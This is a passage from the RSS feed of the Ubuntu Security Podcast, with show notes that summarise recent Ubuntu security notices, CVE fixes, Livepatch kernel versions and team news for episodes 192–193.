<li>Similar to <a href="/episode-191/#usn-5955-1-emacs-vulnerability-00-50">[USN-5955-1] Emacs vulnerability [00:50]​</a> from Episode 191 - again
if used org-mode to output to a latex document which included other documents
that had shell metacharacters in their filenames, could get code execution as
the user running Emacs</li>
</ul>
<h3 id="usn-6002-1-irssi-vulnerability--05-45">[<a href="https://ubuntu.com/security/notices/USN-6002-1">USN-6002-1</a>] Irssi vulnerability (05:45)</h3>
<ul>
<li>1 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-29132">CVE-2023-29132</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>IRC client - UAF when outputting a line which was not formatted whilst also
outputting a line that was formatted - only likely to be able to be triggered
by various scripts - was discovered after a recent update to GLib 2.75 which
stopped using it&rsquo;s own internal memory allocator and instead switched to
regular <code>malloc()</code> / <code>free()</code> - would then trigger the memory checking of libc
which detected this</li>
</ul>
<h3 id="usn-6005-1-sudo-vulnerabilities--07-25">[<a href="https://ubuntu.com/security/notices/USN-6005-1">USN-6005-1</a>] Sudo vulnerabilities (07:25)</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28487">CVE-2023-28487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28486">CVE-2023-28486</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to escape control characters in both the log output and <code>sudoreplay</code> (can
be used to list or play back the commands executed in a sudo session) - and so
could allow an attacker to get code execution as the user running <code>sudoreplay</code>
by injecting terminal control characters</li>
</ul>
<h3 id="usn-6010-1-firefox-vulnerabilities--08-45">[<a href="https://ubuntu.com/security/notices/USN-6010-1">USN-6010-1</a>] Firefox vulnerabilities (08:45)</h3>
<ul>
<li>15 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-29541">CVE-2023-29541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29539">CVE-2023-29539</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29538">CVE-2023-29538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29536">CVE-2023-29536</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29535">CVE-2023-29535</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29533">CVE-2023-29533</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29551">CVE-2023-29551</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29550">CVE-2023-29550</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29549">CVE-2023-29549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29548">CVE-2023-29548</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29547">CVE-2023-29547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29544">CVE-2023-29544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29543">CVE-2023-29543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29540">CVE-2023-29540</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29537">CVE-2023-29537</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>112.0 - one Linux specific vuln in particular around the handling of
downloaded <code>.desktop</code> files - could allow an attacker to get code execution as
the user running firefox - interesting to note that as a snap, firefox is
confined by default and cannot execute arbitrary commands from the host
system - can only use binaries from within the <code>firefox</code> snap itself or the
user&rsquo;s <code>$HOME</code> which makes exploitation of such an issue harder since less
LOLBins to make use of</li>
</ul>
<h3 id="usn-6011-1-json-smart-vulnerabilities--10-00">[<a href="https://ubuntu.com/security/notices/USN-6011-1">USN-6011-1</a>] Json-smart vulnerabilities (10:00)</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1370">CVE-2023-1370</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31684">CVE-2021-31684</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Small and fast JSON parser for Java - two similar issues, one in handling of
unclosed quotes and the other in unclosed brackets - both could allow an
attacker to DoS the application through crafted input</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="preparing-for-the-release-of-ubuntu-23-dot-04--lunar-lobster----10-36">Preparing for the release of Ubuntu 23.04 (Lunar Lobster) (10:36)</h3>
<ul>
<li>Team has been busy finishing various items from the development roadmap for
this cycle:
<ul>
<li>SBOM specification</li>
<li>improvements to how we distribute OVAL data</li>
<li>evaluation of dbus-broker integration with AppArmor to possibly replace
dbus-daemon in a future Ubuntu release</li>
<li>Testing unprivileged user namespace restrictions via AppArmor</li>
<li><code>io_uring</code> mediation support in AppArmor</li>
<li>Working with the snapd team on integrating <code>dm-verity</code> within snapd for
improved integrity of snaps</li>
<li>Usual maintenance items as well:
<ul>
<li>all the normal CVE patching</li>
<li>a heap of MIR security reviews</li>
<li>snap store reviews</li>
<li>AppArmor upstream project maintenance</li>
</ul>
</li>
<li>and more</li>
</ul>
</li>
</ul>
<h3 id="ubuntu-security-podcast-on-2-weeks-break">Ubuntu Security Podcast on 2 weeks break</h3>
<ul>
<li>Alex on leave next week and the following week is the 23.10 start-of-cycle
product roadmap sprint in Prague</li>
<li>Expect the podcast to be back the week ending 5th May</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E193.mp3" length="14913983" type="audio/mpeg" /><itunes:duration>883</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 192
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-192/</link>
          <pubDate>Fri, 31 Mar 2023 23:25:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>12d01ba86f7c3cc2918861c83d374e6eabd2652e4a445923e27383dfd5a83596e8eaccb784bf84d84355cd509769a5594897c01932cca58b44f845bf69615f1e</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 192</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Ubuntu gets pwned at Pwn2Own 2023, plus we cover security updates for vulns in
  GitPython, object-path, amanda, url-parse and the Linux kernel - and we mention
  the recording of Alex's Everything Open 2023 presentation as well.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Ubuntu gets pwned at Pwn2Own 2023, plus we cover security updates for vulns in
  GitPython, object-path, amanda, url-parse and the Linux kernel - and we mention
  the recording of Alex's Everything Open 2023 presentation as well.
  </itunes:summary>
        <description>  Ubuntu gets pwned at Pwn2Own 2023, plus we cover security updates for vulns in
  GitPython, object-path, amanda, url-parse and the Linux kernel - and we mention
  the recording of Alex's Everything Open 2023 presentation as well.
  </description>
        <googleplay:description>  Ubuntu gets pwned at Pwn2Own 2023, plus we cover security updates for vulns in
  GitPython, object-path, amanda, url-parse and the Linux kernel - and we mention
  the recording of Alex's Everything Open 2023 presentation as well.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Ubuntu gets pwned at Pwn2Own 2023, plus we cover security updates for vulns in
GitPython, object-path, amanda, url-parse and the Linux kernel - and we mention
the recording of Alex&rsquo;s Everything Open 2023 presentation as well.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>91 unique CVEs addressed</p>
<h3 id="usn-5968-1-gitpython-vulnerability-00-46">[<a href="https://ubuntu.com/security/notices/USN-5968-1">USN-5968-1</a>] GitPython vulnerability [00:46]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24439">CVE-2022-24439</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>RCE via a malicious URL when cloning a repo - would call git clone under the
hood and pass the purported URL in without any validation</li>
<li>Used as a dependency for other Python based tools etc - in particular by
Bandit, Python security checking tool - used to scan python projects for
security issues - would be ironic if a tool used to scan for security problems
could be used to leverage an attack - so I took a quick look at the source
code for bandit and it seems to only use GitPython to check if the current
directory is a git repo or not - so would not be able to be exploited by this
issue</li>
</ul>
<h3 id="usn-5967-1-object-path-vulnerabilities-02-11">[<a href="https://ubuntu.com/security/notices/USN-5967-1">USN-5967-1</a>] object-path vulnerabilities [02:11]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3805">CVE-2021-3805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23434">CVE-2021-23434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15256">CVE-2020-15256</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>all prototype pollution vulns - a type of injection attack that particularly
applies for languages like Javascript, where an attacker can add arbitrary
properties to global / default javascript objects that then get inherited by
user-defined objects - and so can result in the ability to change the logic of
the application or potentially even get remote code execution (depending on
how those object properties are used by the application)</li>
</ul>
<h3 id="usn-5942-2-apache-http-server-vulnerability-02-56">[<a href="https://ubuntu.com/security/notices/USN-5942-2">USN-5942-2</a>] Apache HTTP Server vulnerability [02:56]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25690">CVE-2023-25690</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>request smuggling attack against <code>mod_proxy</code></li>
</ul>
<h3 id="usn-5966-1-usn-5966-2-amanda-vulnerabilities-03-06">[<a href="https://ubuntu.com/security/notices/USN-5966-1">USN-5966-1</a>, <a href="https://ubuntu.com/security/notices/USN-5966-2">USN-5966-2</a>] amanda vulnerabilities [03:06]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37705">CVE-2022-37705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37704">CVE-2022-37704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37703">CVE-2022-37703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>amanda has several suid-root binaries - each was able to be abused in a
different way - one to see if a given directory existed or not (info leak),
and the others to both get code execution etc - update introduced a regression
which was then also fixed</li>
</ul>
<h3 id="usn-5969-1-gif2apng-vulnerabilities-04-00">[<a href="https://ubuntu.com/security/notices/USN-5969-1">USN-5969-1</a>] gif2apng vulnerabilities [04:00]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45911">CVE-2021-45911</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45910">CVE-2021-45910</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45909">CVE-2021-45909</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5971-1-graphviz-vulnerabilities-04-12">[<a href="https://ubuntu.com/security/notices/USN-5971-1">USN-5971-1</a>] Graphviz vulnerabilities [04:12]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-18032">CVE-2020-18032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11023">CVE-2019-11023</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10196">CVE-2018-10196</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different NULL ptr derefs, 1 buffer overflow -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-5954-2-firefox-regressions-04-40">[<a href="https://ubuntu.com/security/notices/USN-5954-2">USN-5954-2</a>] Firefox regressions [04:40]</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28161">CVE-2023-28161</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28164">CVE-2023-28164</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28160">CVE-2023-28160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25751">CVE-2023-25751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28177">CVE-2023-28177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28176">CVE-2023-28176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28162">CVE-2023-28162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25752">CVE-2023-25752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25750">CVE-2023-25750</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>111.0.1 - fixes a couple regressions on macOS and Windows apparently</li>
</ul>
<h3 id="usn-5972-1-thunderbird-vulnerabilities-04-58">[<a href="https://ubuntu.com/security/notices/USN-5972-1">USN-5972-1</a>] Thunderbird vulnerabilities [04:58]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25752">CVE-2023-25752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28164">CVE-2023-28164</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25751">CVE-2023-25751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28176">CVE-2023-28176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28162">CVE-2023-28162</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>102.9.0</li>
</ul>
<h3 id="usn-5973-1-url-parse-vulnerabilities-05-11">[<a href="https://ubuntu.com/security/notices/USN-5973-1">USN-5973-1</a>] url-parse vulnerabilities [05:11]</h3>
<ul>
<li>8 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0686">CVE-2022-0686</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0691">CVE-2022-0691</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0639">CVE-2022-0639</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0512">CVE-2022-0512</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3664">CVE-2021-3664</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27515">CVE-2021-27515</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8124">CVE-2020-8124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3774">CVE-2018-3774</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>nodejs module for parsing URLs - even for such a seemingly simple task as
parsing URLs, can have various vulnerabilities
<ul>
<li>DoS, SSRF, open-redirect, or bypass various other authorisation checks</li>
</ul>
</li>
<li>upstream project now recommends to use the URL interface from nodejs and the
various browsers for &ldquo;better security and accuracy&rdquo;</li>
</ul>
<h3 id="usn-5974-1-graphicsmagick-vulnerabilities-06-24">[<a href="https://ubuntu.com/security/notices/USN-5974-1">USN-5974-1</a>] GraphicsMagick vulnerabilities [06:24]</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1270">CVE-2022-1270</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12672">CVE-2020-12672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11006">CVE-2019-11006</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9018">CVE-2018-9018</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5685">CVE-2018-5685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20189">CVE-2018-20189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20184">CVE-2018-20184</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5686-4-git-vulnerability-06-37">[<a href="https://ubuntu.com/security/notices/USN-5686-4">USN-5686-4</a>] Git vulnerability [06:37]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39253">CVE-2022-39253</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-181/#usn-5686-1-git-vulnerabilities">[USN-5686-1] Git vulnerabilities from Episode 181</a></li>
</ul>
<h3 id="usn-5970-1-linux-kernel-vulnerabilities-06-45">[<a href="https://ubuntu.com/security/notices/USN-5970-1">USN-5970-1</a>] Linux kernel vulnerabilities [06:45]</h3>
<ul>
<li>9 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1195">CVE-2023-1195</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0469">CVE-2023-0469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0266">CVE-2023-0266</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0045">CVE-2023-0045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4382">CVE-2022-4382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42329">CVE-2022-42329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42328">CVE-2022-42328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2196">CVE-2022-2196</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="lsn-0093-1-linux-kernel-vulnerability-07-15">[<a href="https://ubuntu.com/security/notices/LSN-0093-1">LSN-0093-1</a>] Linux kernel vulnerability [07:15]</h3>
<ul>
<li>2 CVEs addressed in all the various Livepatch supported releases (LTS and
16.04 ESM) across various different kernels
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0461">CVE-2023-0461</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0179">CVE-2023-0179</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in Upper Level Protocol and buffer overflow in netfilter when handling
VLAN headers - both could allow a local user to DoS / code execution in kernel
-&gt; EoP</li>
</ul>
<table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
          <th>16.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>93.1</td>
          <td>93.1</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.15</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-hwe</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>93.1</td>
          <td>93.1</td>
          <td>—</td>
          <td>93.1</td>
      </tr>
      <tr>
          <td>azure-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>93.2</td>
          <td>93.1</td>
          <td>—</td>
          <td>93.1</td>
      </tr>
      <tr>
          <td>gcp-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.15</td>
          <td>—</td>
          <td>93.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>93.1</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>93.1</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>93.2</td>
          <td>93.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.15</td>
          <td>—</td>
          <td>93.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>93.1</td>
          <td>93.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>93.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>93.1</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>93.1</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>oem</td>
          <td>—</td>
          <td>—</td>
          <td>93.1</td>
          <td>—</td>
      </tr>
  </tbody>
</table>
<p>To check your kernel type and Livepatch version, enter this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>canonical-livepatch status
</span></span></code></pre></div><h3 id="usn-5975-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5975-1">USN-5975-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>31 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28328">CVE-2023-28328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26607">CVE-2023-26607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0266">CVE-2023-0266</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0045">CVE-2023-0045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47929">CVE-2022-47929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42329">CVE-2022-42329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42328">CVE-2022-42328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41218">CVE-2022-41218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3545">CVE-2022-3545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3521">CVE-2022-3521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3424">CVE-2022-3424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29900">CVE-2022-29900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20369">CVE-2022-20369</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3669">CVE-2021-3669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0461">CVE-2023-0461</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5976-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5976-1">USN-5976-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3061">CVE-2022-3061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2196">CVE-2022-2196</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0461">CVE-2023-0461</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
